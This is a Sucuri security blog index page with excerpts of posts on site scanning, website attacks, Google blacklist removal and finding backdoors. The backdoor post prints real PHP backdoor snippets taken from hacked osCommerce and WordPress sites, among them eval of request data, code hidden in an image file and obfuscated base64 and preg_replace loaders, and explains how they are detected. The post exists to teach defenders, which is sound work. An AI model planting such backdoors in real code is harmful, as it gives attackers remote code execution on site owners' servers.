Ask Sucuri: How does SiteCheck work?

October 20, 2012 by 5 Comments

If you have any questions about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.

Question: How does SiteCheck work? I just scanned a site that I think is compromised but the scanner is showing it as clean. Is my site really clean or did you make a mistake?

Answer: SiteCheck is our free, remote website scanner that works to identify if the provided site is infected with any type of malware (including SPAM) or if it’s been blacklisted or defaced.

Read More

Filed Under: Ask, SiteCheck, sucuri Tagged With: , , ,

Automation is Key With Today’s Website Attacks

August 10, 2012 by 5 Comments

When trying to undertand the anatomy of attacks on websites you have to break it down into manageable parts. In my mind it really comes down to two types: Targeted and Opportunistic.

More important to understand is how the attack is executed, and that’s what I want to spend some time on in this post.

What do today’s attacks look like?

For most, targeted attacks will be rare, but they do happen every day. You might recall mentions on the news about the CIA website being defaced, or LinkedIn and eHarmony being compromised, in both those instances, I’d categorize those as targeted attacks. There are also examples like the most recent article that talked to the Gizmodo employee who appeared to have lost his entire digital identify, simply because the attacker liked his Twitter handle.

On the flip side, you have opportunistic attacks that are likely what most reading this get affected by. I provide a better discussion on it on our post, Understanding Opportunistic Attacks. The good news though is that in both instances you find many similarities in the attacks, specifically the use of tools that allow for automation.

Read More

Filed Under: Ask, awareness, hacked, Learn, research, security, sucuri Tagged With: , , , , ,

Secure Website Development – Importance of Developing Securely

August 1, 2012 by Leave a Comment

We clean hundreds of sites every day and often their problems are associated with the same issues: outdated and sometimes unnecessary software, weak passwords and so on. But sometimes the issue is not as superficial, sometimes it goes a bit deeper than that. You know your server is updated, your CMS is also (ie., WordPress, Joomla, Drupal), yet you still get infected! How is that possible?!

That’s the question we hope to address in a series of posts related to developing with security in mind. This unfortunately is not something tailored for end-users, unless as an end-user you’re responsible for the development of your website. It is however good for end-users to read as it’ll help better understand other possible vectors affecting their infection or reinfection scenarios.

Read More

Filed Under: education, php, protection, security Tagged With: , , , , ,

Pharma Hack Backdoor Analyzed – PHP5.PHP

July 23, 2012 by 17 Comments

Some of you might remember my last Pharma hack post, Intelligent (Pharma) SPAM Decoded, today I will spend some time looking a different variant of the same infection type but focus on a payload that is not encoded or embedded within an existing file, instead it resides in its own file – PHP5.php.

“Hmm, maybe it’s a good / system file, it does have PHP in it, I won’t bother looking at it…”

If you have ever come across this file and find yourself thinking this, we highly encourage you not to and take a minute to see if any of its components resemble what we’re about to share.

Dissecting the Payload


Read More

Filed Under: awareness, backdoors, Malware, pharma, php, research, Spam, sucuri Tagged With: , , , , , ,

ASK Sucuri: What should I do if my email is in the Yahoo Leak?

July 13, 2012 by 33 Comments

We love to get questions from you, our readers, in our Ask Sucuri series. If you have any questions about website malware, blacklisting, or security in general, send us an email to: info@sucuri.net or hit us on Twitter – @sucuri_security.

Yesterday we released a blog post about the Yahoo Leak, and created an online tool to check if your email was exposed in the leak. Since then, we have received hundreds of emails asking what should be done for anyone whose account was compromised.

Read More

Filed Under: Ask, leak, yahoo Tagged With: , ,

Ask Sucuri: What should I know when engaging a Web Malware Company?

April 24, 2012 by 6 Comments

We work in a business in which it is always chaos. In most situations the client is often distraught, vulnerable, and is plagued with this feeling of being out of control. It is the business of web malware cleanup. The last thing any website owner wants is to delay the cleanup process because of silly things that could have been easily prevented.

In our mind, there are three things you must know before engaging with any web malware company:

  • Know Your Host
  • Know How to Access Your Server
  • Have a Backup

As simple as they may appear, they still remain allusive to many.
Read More

Filed Under: Ask, awareness, community, host, Malware, sucuri Tagged With: , , , , , ,

Ask Sucuri: How to Stop The Hacker and ensure Your Site is Locked!!

April 23, 2012 by 7 Comments

With the rise in web malware over the last 6 – 12 months, it’s important that we take some time to continue to educate and offer insight into ways that can help you stay ahead, in the hopes of stopping the hacker.

Understanding The Hacker

Before we get started, lets take a look at the name “Hacker.” What many folks don’t realize is that while “Hacker” is often associated with bad, it also has a good association.

To the popular press, “hacker” means someone who breaks into computers. Among programmers it means a good programmer. But the two meanings are connected. To programmers, “hacker” connotes mastery in the most literal sense: someone who can make a computer do what he wants—whether the computer wants to or not. – source: Paul Graham


Read More

Filed Under: Ask, awareness, sucuri Tagged With: , , ,

Ask Sucuri: Talk More About Web-Based Malware

March 2, 2012 by 12 Comments

If you have any questions about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here.

For all the “Ask Aucuri” answers, go here.

Question: My site got hacked and it is distributing malware. Why would anyone do that to me? I don’t know much about viruses on web sites. How do they work?

This is a question we get very often. How can a site have a “virus”? Where does it hide? How does it work? Why would anyone hack my site?

Read More

Filed Under: Ask, Malware, sucuri Tagged With: , , ,

Ask Sucuri: How Long Does It Take For a Site To Be Removed From Google’s Blacklist? – Updated

December 14, 2011 by 1 Comment

If you have any questions about malware, blacklisting, or security in general, send it over to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here

This is an update to our previous post about Google blacklisting. We have some updated numbers to share.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?

Answer: This is a very common question. In fact, every time we clear a hacked site, their owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.

Current Results:

  • Average time from submission to removal: 440 minutes (about 7 hours)
  • Maximum time: 792 (13 hours)
  • Minimum time: 290 (a bit less than 5 hours)

On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.

How do you increase your odds of getting cleared faster?

  1. Make sure to clean everything up!
  2. Do not remove the infected files, fix them. If you remove them, they will 404, and a 404 will delay the verification (even if you need to leave the file with a 0-size, don’t remove it until after the site is de-listed).
  3. Follow best practices to increase security on your site so that you minimize the risk of reinfection.

That’s it. Let us know if you have any questions or comments.

Is your site hacked? Blacklisted? We are here to help! We can get your sites cleaned up and secured right away!

Filed Under: Ask, blacklist, blacklisted, google, sucuri Tagged With: , , , ,

ASK Sucuri: What about the backdoors?

September 8, 2011 by 4 Comments

If you have any question about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here. For all the “ask sucuri” answers, go here.

Question: What about the backdoors? Why are they so hard to find? How do you guys find them?

When a site gets compromised, one thing we know for sure is that the attackers will leave some piece of malware in there to allow them access back to the site. We call this type of malware, backdoors.

Backdoors are very hard to find because they don’t have to be linked anywhere in the site, they can be very small and be easily confused with “normal” code. Some of them have passwords, some are heavily encrypted/encoded and can be anywhere in your site.

On most online forums, people tell you to search for “eval (base64_decode” and things like that to identify hidden backdoors, but that’s likely not to find everything (and your site will just get reinfected).

For example, on the latest oscommerce compromises, all the sites had the following code added to the application_top.php file:

if (isset($_REQUEST[\'asc\'])) eval(stripslashes($_REQUEST[\'asc\']));

Yes, that is a backdoor. It allows the attacker to execute any type of code, add files, remove files, etc. When you are analysing thousands of lines of code, it is easy to miss it.

What about this one:

wp__theme_icon=create_function(”,file_get_contents(‘/path/wp-content/themes/themename/images/void.jpg’));$wp__theme_icon();

What you think? Yes, another backdoor, but this time the bulk of it is hidden inside an image (void.jpg). See what we mean, by being hard to detect and search for?
 

Fun Quiz: Find the backdoor?

Since backdoors can be in any type or shape, let’s look at some examples:

The “Filesman” backdoor, big, complex and easy to find:

$auth_pass = “63a9f0ea7bb98050796b649e85481845″;
$color = “#df5″;
$default_action = “SQL”;
$default_charset = “Windows-1251″;
$protectionoffer = “ficken”;
preg_replace(“/.*/e”,”\x65\x76\x61\x6C\.. hundreds more lines..

Another simple backdoor, executing any code from the “php” request:

eval (base64_decode($_POST["php"]));

A WordPress-based backdoor. This time, the bad content is hidden inside the database (wp-options tables)

return @eval(get_option(\’blogopt1\’));

A messy backdoor we are seeing in the latest timthumb.php attacks. On this case, all the variables are completely random per case and per file:

>function aknhtkmml3($ur5){$dtuq=’$u’;$pnt=’e6′;$p5zy=’r';$xcl4=’e(‘;$feuh=’od’;$qjka=’dec’;$rhi=’$u’;
$m=’as’;$xcew=’);’;$iw=’_';$jutx=’5=b’;$fwiw=’4′;$zqi=’r';$pwrb=’5′;
eval($rhi.$p5zy.$jutx.$m.$pnt.$fwiw.$iw.$qjka.$feuh.$xcl4.$dtuq.$zqi.$pwrb…
return $ur5;}$sk25=’M3JffC1WcjMrVi1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a…

Another messy one. Do you know how the code is executed there? Preg_replace with the “e” modifier actually acts like an “eval”:

>$lllllll=’lllllllll’;
$llllll=”/^.*$/e”;
$llllllll=’ZnVuY3Rpb24gZnVu3STVFNmxObm1V… LONG LINE of code.. dXBoQmRxemtuRE1SSXJwdjUwd3NWUUhrWmV3dWFKbHUvZzVpc1JKa0M1TWF2RFVMV1cwUG1XKzJF
$lllllllll=pack(‘H*’, ’406576616c286261736536345f6465636f646528′).’\$llllllll))’;
preg_replace($llllll, $lllllllll, $lllllll);

Searching for base64_decode? Well, what happens when the attackers do this:

<?php $XKsyG=’as’;$RqoaUO=’e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb
=’b’.$XZKsyG.$RqoaUO.(64).’_’.’d’.$RqoaUO.’c’.’o’.’d’.$RqoaUO;@$ygDOEJ(@$j
oEDdb(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY…

And those are just some simple examples…

 

So, how to find backdoors?

Finding them is very hard, but inside Sucuri we were able to come up with some techniques that work very well:

  1. White listing. We know how the good files look like. We have a large checksum set of all the core WordPress, Joomla, osCommerce, Wiki, etc, etc files. We also have the checksum for the most popular plugins, modules, extensions and themes. Do you know what that gives us? We know right away if any of the core files were modified (or a new one added) and we can ignore safely the good ones.
  2. Black listing. We also have a list with thousands of backdoors (and their variations) that we have been finding in the last few years.
  3. Anomaly checks. When a file is not in our white list (core files) and not in our blacklist, we do our anomaly checks, where all the functions/variables are analysed and manually inspected to see if they are a backdoor. If it is, we modify our blacklists to catch them in the future, if not, another file to our white list…

So we mix white listing + blacklisting and our own manual analysis to find all the backdoors in a site. If you are trying to clean a compromised site by your self, we recommend first overwriting all the files you can (core files, plugins, etc). Of what is left, you have to analyse manually to make sure it is clean…

What do you think? I would love to hear other ideas to identify backdoors that you guys are using.

Need someone to secure and clean a hacked site? Sign up with us here: http://sucuri,net/signup.

Filed Under: Ask, backdoors, security, sucuri Tagged With: , , ,
«Older Posts